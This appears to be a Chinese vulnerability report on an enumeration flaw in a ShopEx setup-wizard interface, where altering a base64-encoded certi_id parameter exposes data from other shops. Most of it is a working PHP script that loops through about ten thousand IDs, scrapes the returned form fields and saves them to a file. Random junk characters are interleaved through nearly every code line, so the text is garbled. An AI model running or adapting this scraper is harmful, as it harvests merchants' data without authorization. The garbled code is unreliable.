简要描述:
ShopEx某接口缺陷,可遍历所有网站
详细说明:
问题出现在shopex 网店使用向导页面
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
<?php
( K0 h, j* k6 h; w! M
8 q0 c8 c& a) @$ p8 y& z6 t for ($i=1; $i < 10000; $i++) { //遍历4 L( N% \$ Y! N% q; b
& H2 P, ^" B, [/ ^& x$ F* |6 s ShowshopExD($i);
' e4 s0 [, \ u% O( O9 \( b0 Y+ R' u+ L6 j3 w: A8 W; o
}
- u f# I* O0 Y( a8 w V v9 t( ]9 v. P) D4 t, V5 U2 E
function ShowshopExD($cid) {3 {/ m) D0 h5 e! S2 N$ ?1 V! w
( q" y4 X1 G: o* L5 ~5 o9 L
$url='http://guide.ecos.shopex.cn/step2.php';) U! f& B W/ E) [
* A4 V( c& B3 }% ^
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
; u' k: Y' u. b) s2 T; t. T6 _1 L
$url = $url.'?refer='.$refer;
! w% m8 ]# K/ C0 L
+ C) \. y4 t( d/ [" u3 K. ~ $ch = curl_init($url);
5 H* F# C- B1 V8 }/ U1 |- l: Y2 @) Y$ E0 K
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;( U2 l# [: F x& d: R) x* [
! s' r' w3 V _' |$ c0 b/ q
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
9 J3 I u' |1 k* u4 k, B K1 {$ a0 V, N/ d9 d* ~" n
$result = curl_exec($ch);
) O( R9 e) }# v( Z2 O
! ~* b& ?0 i) U' d9 g4 R3 P( m $result = mb_convert_encoding($result, "gb2312", "UTF-8");5 i% |9 ~; {: l2 s
0 v k6 {; M5 O- C" ?
if(strpos($result,$refer))
) F! w6 v3 T7 Y7 N" Q( W1 k! s# I# t& F6 M* @
{
K, `2 r' Z; p' Z; h
' w8 N8 |2 X f $fp = fopen("c:/shopEx.txt",'ab'); //保存文件
0 B$ k% _% f" [, r3 z" o) w) H, O5 p3 E; F
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
# D# a6 q M* n) Z) b" q* ~1 v6 Q" x4 b$ X! }
foreach ($value[1] as $key) {
( L8 u" L9 O1 [2 B1 ^
/ A* [6 U6 I, p8 Z/ [% S8 J preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);3 C$ P2 g% G3 z& _! l( P: v
8 m6 |$ C# V* G5 M0 q
echo $res[1][0].':'.$res[3][0]."\r\n";8 I0 K8 ?$ m/ K- u0 |
3 l: L$ j$ J' A3 m. n( i/ A$ F6 ` $col =$res[1][0].':'.$res[3][0]."\r\n"; , q; m" d/ I% N; m8 f) p% I
3 [8 V: Z( G6 Q; V5 N" L
fwrite($fp, $col, strlen($col)); 2 A. k8 s1 d/ R8 z. A9 P# v' u
* [' J! e2 G, R! r: Q6 f
}
& y, O6 a' ?' l! a& i
P1 W$ Q8 {( M/ J, Y! I6 E6 F echo '--------------------------------'."\r\n";
: C& D3 y& N5 E% W% n* C* ~( D$ T6 F. ?5 Y# {8 N; d; J' j
fclose($fp); 2 J! e. [& b( {) M" D- j/ m
$ x) q: J; `3 n9 J. {6 x. X6 t% e* M* Y, Y }
5 V, h) c- z, L \
( m0 J) Z) w2 C2 L; ^ flush();
" C5 K! x4 Y. E/ o D. y0 Q. C1 Q
curl_close($ch);" T9 Y& J, b8 x2 W' q3 A
! C& q/ w+ D& |) R
}2 g1 U' N, ]( [ |5 ?
- i* V% v& N9 T/ x, v! [0 t?>! O, C2 ^6 Z9 B( x
漏洞证明:
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
refer换成其他加密方式